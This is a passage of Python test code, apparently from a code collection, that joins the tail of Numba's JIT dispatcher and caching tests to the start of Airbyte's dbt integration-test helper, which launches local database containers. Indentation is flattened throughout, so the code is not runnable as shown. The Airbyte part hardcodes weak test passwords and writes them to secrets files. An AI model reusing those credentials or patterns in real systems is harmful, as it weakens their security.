@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper, module_len, module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_issue_with_array_layout_conflict(self):
"""
        This tests an issue with the dispatcher when an array that is both
        C and F contiguous is supplied as the first signature.
        The dispatcher checks for F contiguity first but the compiler checks
        for C contiguity first. This results in C contiguous code being
        inserted as the F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertEqual(str(w[0].message),
'Cannot cache compiled function "looplifted" '
'as it uses lifted loops')
def test_big_array(self):
        # Code referencing big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_c_sin
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_c_sin"',
str(w[0].message))
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
        # Functions with the same name should still be disambiguated
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
            # returns None, since it cannot find the module source;
            # only succeeds when the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
        # across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be passed as an argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Boxing the returned module object will always raise when converting
# the native value back to a Python object.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
if __name__ == '__main__':
unittest.main()
|
dbt_integration_test.py
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
import os
import random
import re
import socket
import string
import subprocess
import sys
import threading
import time
from copy import copy
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
NORMALIZATION_TEST_TARGET = "NORMALIZATION_TEST_TARGET"
NORMALIZATION_TEST_MSSQL_DB_PORT = "NORMALIZATION_TEST_MSSQL_DB_PORT"
NORMALIZATION_TEST_MYSQL_DB_PORT = "NORMALIZATION_TEST_MYSQL_DB_PORT"
NORMALIZATION_TEST_POSTGRES_DB_PORT = "NORMALIZATION_TEST_POSTGRES_DB_PORT"
NORMALIZATION_TEST_CLICKHOUSE_DB_PORT = "NORMALIZATION_TEST_CLICKHOUSE_DB_PORT"
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = []
@staticmethod
def generate_random_string(prefix: str) -> str:
return prefix + DbtIntegrationTest.random_string(5)
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def set_target_schema(self, target_schema: str):
self.target_schema = target_schema
def setup_db(self, destinations_to_test: List[str]):
if DestinationType.POSTGRES.value in destinations_to_test:
self.setup_postgres_db()
if DestinationType.MYSQL.value in destinations_to_test:
self.setup_mysql_db()
if DestinationType.MSSQL.value in destinations_to_test:
self.setup_mssql_db()
if DestinationType.CLICKHOUSE.value in destinations_to_test:
self.setup_clickhouse_db()
def setup_postgres_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
if start_db:
self.db_names.append("postgres")
print("Starting localhost postgres container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"marcosmarxm/postgres-ssl:dev",
"-c",
"ssl=on",
"-c",
"ssl_cert_file=/var/lib/postgresql/server.crt",
"-c",
"ssl_key_file=/var/lib/postgresql/server.key",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for Postgres DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
if start_db:
self.db_names.append("mysql")
print("Starting localhost mysql container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for MySQL DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mssql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "SA",
"password": "MyStr0ngP@ssw0rd",
"port": port,
"database": self.target_schema,
"schema": self.target_schema,
}
if start_db:
self.db_names.append("mssql")
print("Starting localhost MS SQL Server container for tests")
command_start_container = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mssql",
